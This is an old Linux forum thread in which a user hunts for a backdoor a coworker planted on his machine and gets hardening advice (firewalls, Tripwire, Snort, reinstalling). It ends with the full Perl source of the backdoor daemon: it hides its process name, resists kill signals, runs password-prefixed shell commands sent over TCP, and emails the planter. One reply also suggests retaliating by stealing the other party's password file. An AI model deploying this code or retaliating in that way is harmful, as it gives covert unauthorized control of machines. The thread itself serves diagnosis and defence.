I've got a trapdoor in my machine!!!

KneeLess · 04-01-2004, 07:02 PM

Doesn't sound like a listening connection or daemon. They probably just added a line to the /etc/profile like this:
mail -s "giosue_c doesn't even know this is happening..." user@location < /dev/null

Although they may have wrote a simple backdoor daemon that waits for an environment variable to be set to a certain thing, or something like that.

chort · 04-01-2004, 08:34 PM

Quote:

Originally posted by LaTechTech
If it is allowed I would take an old PI or PII machine and install a Smoothwall on it and put it between your computer and the local area network. Smoothwall turns your old PC into a hardware firewall. You will probably need a couple of network interface cards. That might stave off any attempts to hack your box for at least a little while, Maybe long enough to repair any damage that is already done.

Anyway, I'm just a nOOb too. These other guys seem to have way more advice than I can provide. So there are my 2cents.

Why in the world would you do that when you could just use a simple host iptables firewall script? You don't put a PIX or a Netscreen in front of every Windows box... Linux is lucky in that it's one of the few OSs (the other common one being *BSD) that has a built-in kernel level packet filter with available tools to configure it.

chort · 04-01-2004, 08:42 PM

For the original poster:

Unless there's some kind of reward for discovering the "backdoor", now is a good time to reformat and reinstall, using all of your new-found advice.

When reinstalling, do not connect the box to the network until you have Tripwire (or AIDE) instealled & configured, and you have configured and loaded an iptables firewall that blocks all incoming connections. Ideally you should remove/disable all unnecessary services before plugging the box into the network, but it's OK to plug in if you have your firewall up and running (just don't forget to disable the services, the firewall won't always save you!).

Other steps to take would be to install a network IDS, like Snort to monitor all the traffic to your box, immediately download all the security patches for any software you have, make sure that your X session starts with "-nolisten tcp", install arpwatch to monitor IPs for sudden MAC address changes, and install logwatch or swatch to keep an eye on your log files for suspicious activity.

giosue_c · 04-02-2004, 10:39 AM

First of all, thanks for all the help everyone. I'm slowly making my way down the list of checks. I'll find this trapdoor.

Now in response to chort,

The reward for finding this backdoor would be to shut up the good-natured, yet annoying stream of taunts that comes from the guy who installed the trapdoor. I'm going to give myself another month to find this thing before I reinstall. And believe me when I say that the next time I install I'm going to have a checklist of things to do before I connect to the network and that list will be comprised of all the things I have learned on this forum and this thread in particular.

unSpawn,

you are right, I should give outputs instead of saying 'it looks legit' because I can make no such assertion with much confidence. I'll do that today.

AltF4 · 04-04-2004, 07:14 PM

do you have a local mailer running ?

yes: check /etc/aliases, etc/procmailrc, etc for strange things (mails to programs, users you don't know, etc)

geekzen · 04-07-2004, 03:40 PM

Bastille. It will help to harden your system :http://www.bastille-linux.org/

Also, either shutdown smtp or firewall it (ie. block its port(s)), unless you absolutely need it. That will stop the emails.

J.W. · 04-07-2004, 10:13 PM

A different thought - it could be that your coworker is using disinformation in an attempt to make you waste time/effort chasing ghosts. If he's doing a little social engineering, it would be a good tactic (on his part) to create the illusion that there is a trapdoor when in fact there isn't, with his goal being to tie up as much of your time as possible on non-productive activities, leaving the real threats to continue to operate for as long as possible.

Not that I wouldn't continue to look for one, but is it a possibility that the "trapdoor" may just be a ruse, intended to distract you from noticing less obvious but more harmful threats? Maybe, maybe not.

Gotta admit, it sounds like you're having a lot of fun. -- J.W.

giosue_c · 04-08-2004, 03:54 PM

AHHHHHHHHHHHH HAAAAAA!!!!
EURRREEEEKA!
and all that

Ok. I have good news. I have found it. Of course this doesn't make me clean because chances are the damn thing is cloned all over the place under different names, but now that i know what it looks like and how it works hopefully I can keep my intruder out and root out all remaining instances of it in my filesystem... hopefully.

by pure chance I stumbled across a suspicious directory called .willy
It contained three files:
.badkarma - a shell script
.bash_history - a bash_history that the perp should have deleted, but instead moved here.
.Xauthority - a file I don't know anything about that when opened in vi is gibberish except the words MIT-MAGIC-COOKIE

I have found that this trapdoor is loaded from my /etc/rc.d/rc.local file
There is also the command 'touch /var/lock/subsys/local'
i can't understand why that would be there...

I want to make sure that I do this right... I am going to remove the lines from my rc.local file. Then I'll move or delete the offending directory. Next I'll set up my firewall. (haven't decided which one to use yet)

Is there anything else I should do??? (I plan on reinstalling when fedora 2 is released)

Finally, and this question is for a moderator, would it be OK to post the code for the trapdoor? It is probably less malicious than many rootkits you can find on the web... And that way we can make sure what I do will truly disable this trapdoor.

rootboy · 04-08-2004, 08:17 PM

Is turnabout fairplay?

http://www.linuxsecurity.com/docs/Ha...ibutions.shtml

If you can get to their password file, they are in deep doo-doo.

John

geekzen · 04-08-2004, 09:05 PM

.Xauthority is normal. It is used for clients to acess the Xserver.

InTheWired · 04-08-2004, 09:18 PM

geekzen

are you sure that would be ok though? if its inside an already suspicious directory there is good chance its a modified version of that original file

My company's webserver was recently hacked... the perp spend several early mornings slowely replacing almost EVERY bin on the system. As far as i've learnt (newb) you can obtain modified bins which will do extra things then originally intended but also do their original task... ie hiding processes etc? is this right, or am i completly wrong

?

if im right you should be weary of the .Xauthority file which is now running, it might allow wierd things to happen. Try checking the checksum/filesize of it against an original from cd/source?

geekzen · 04-08-2004, 09:22 PM

No... i meant if its in the home dir. The one in .willy can go. I'm just trying to avoid a newb deleting his .Xauthority in an xsession then wondering why he cannot start programs. .Xauthority is generated everytime an xserver is started i belive, so there is not "Checksum" you can check it against. I think its just their because the perp started and X session.

About the modified binaries, you are correct, although, its not so common. I really have to say that a reinstall is the best bet here. Back up all old files, then reinstall.

unSpawn · 04-09-2004, 04:11 PM

Finally, and this question is for a moderator, would it be OK to post the code for the trapdoor? It is probably less malicious than many rootkits you can find on the web... And that way we can make sure what I do will truly disable this trapdoor.
Go right ahead.

tekhead2 · 04-11-2004, 10:07 PM

Have you tried to Nmap, or Nessus sweep your box yet to see if there are any ports that are open. I think that you really should check them from another box, seeing that yours is owned. If you have any weird looking ports open look them up most of the time a singel backdoor or trojan will use a specific port. That way you could get a good idea if you are vulnerable, since your local access is somewhat tainted.

giosue_c · 04-12-2004, 10:42 AM

Here is the "evil server"
I am trying to understand all of what it does. It is a crash course in scripting...
I went through and put x's where our company email addresses were. everything else is the same

#!/usr/bin/perl -w
################################################################################
# script: esd.pl 08-AUG-2001
#
# description: Evil Server Daemon :: OH THE PAIN
################################################################################
require 5.001;

use strict;
use POSIX;
use IO::Socket;
use Mail::Sendmail;

$| = 1; # Turn off print buffering

# ------ VARIABLES ----------------------------------------------------------- #
my $password = 'fooboo';
my $port = &randport();
my $localhost = `hostname`;
chop($localhost);
my $MAILTO = 'xxxxxx@xxx.org';
my $MAILFROM = 'giosue_c <xxxx@xxx.org>';
my $SUBJECT = 'ESD - STARTED!!';

# ------ MAIN ---------------------------------------------------------------- #
# Fork once, and let the parent exit.
my $pid = fork;
die "Couldn't fork: $!\n" unless ( defined($pid) );

if ( $pid )
{
my $MESSAGE = localtime(time) ." -- Started ES Daemon \[$pid/$port\]\n";

my %mail = ( 'To' => $MAILTO,
'From' => $MAILFROM,
'Subject' => $SUBJECT,
'Message' => $MESSAGE);

$mail{'smtp'} = 'mail.xxx.org';
sendmail(%mail);

exit;
}

# Dissociate from the controlling terminal that started us and stop being
# part of whatever process group we had been a member of.
POSIX::setsid() or die "Can't start a new sesion: $!\n";

# Set ps identity, attempt to hide ;-)
$0 = "[kjourna1d]";

# Trap fatal signals, setting a flag we need to spawn a new process.
my $attempt_to_kill = 0;

# Signals to trap so that we can start another process.
$SIG{'INT'} = $SIG{'QUIT'} = $SIG{'HUP'} = $SIG{'TRAP'} = $SIG{'ABRT'} = $SIG{'STOP'} = $SIG{'IOT'} = $SIG{'TERM'} = $SIG{'KILL'} = \&shutdown;

# Wrap actual server code within the loop.
until ( $attempt_to_kill )
{
my $sock = new IO::Socket::INET (LocalHost => $localhost,
LocalPort => $port,
Proto => 'tcp',
Listen => 5,
Reuse => 1);

die "couldn't create socket: $!\n" unless ( $sock );

while( my $new_sock = $sock->accept() )
{

print $new_sock <<EOF;
, .-'"'=;_ ,
|\\.'-~`-.`-`;/|
\\.` '.'~-.` './
(\\`,__=-'__,'/)
_.-'-.( d\\_/b ).-'-._
/'.-' ' .---. ' '-.`\\
/' .' (= (_) =) '. `\\
/' .', `-.__.-.__.-' ,'. `\\
( .'. V V ; '. )
( |:: `-,__.-.__,-' ::| )
| /|`:. .:'|\\ |
| / | `:. :' |`\\ |
| | ( :. .: ) | |
| | ( `:. :' ) | |
| | \\ :. .: / | |
| | \\`:. .:'/ | |
) ( `\\`:. .:'/' ) (
( `)_ ) `:._.:' ( _(` )
\\ ' _) .' `. (_ ` /
\\ '_) / .'"```"'. \\ (_` /

EVIL SERVER
========================
OH THE PAIN
EOF

while ( defined(my $buf = <$new_sock>) )
{
$_ = $buf;

if ( /exit/ )
{
print $new_sock "sorry can't exit";
}
else
{
$_ = $buf;

if( /^$password/ )
{
$buf =~ s/^$password//o;
my $output = `$buf`;
print $new_sock $output;
}
}
}
}

close($sock);
}

# Shuts down gracefully
sub shutdown
{
$attempt_to_kill = 1;
my $MESSAGE = localtime(time) ." -- ES Daemon Shutting Down!\r\n";

my %mail = ( 'To' => $MAILTO,
'From' => $MAILFROM,
'Subject' => $SUBJECT,
'Message' => $MESSAGE);

$mail{'smtp'} = 'mail.xxx.org';
sendmail(%mail);
}

# Get Random Service Port
sub randport
{
open( SERVC, "< /etc/services" ) or die "unable to read /etc/services: $!\n";
my @ports = ();
while(<SERVC>)
{
chomp;
s/\#.*//;
s/^\s+//;
s/\s+$//;
next unless ( length );
s/\s+/\|/g;
my ( $name, $serv, $junk ) = split( /\|/, $_ );
my ( $port, $prot ) = split( /\//, $serv );
next if( $prot eq 'udp' );
next if( $port < 1024 );
push( @ports, $port );
}
close(SERVC);
srand($$^time);

return( $ports[int(rand($#ports))] );
}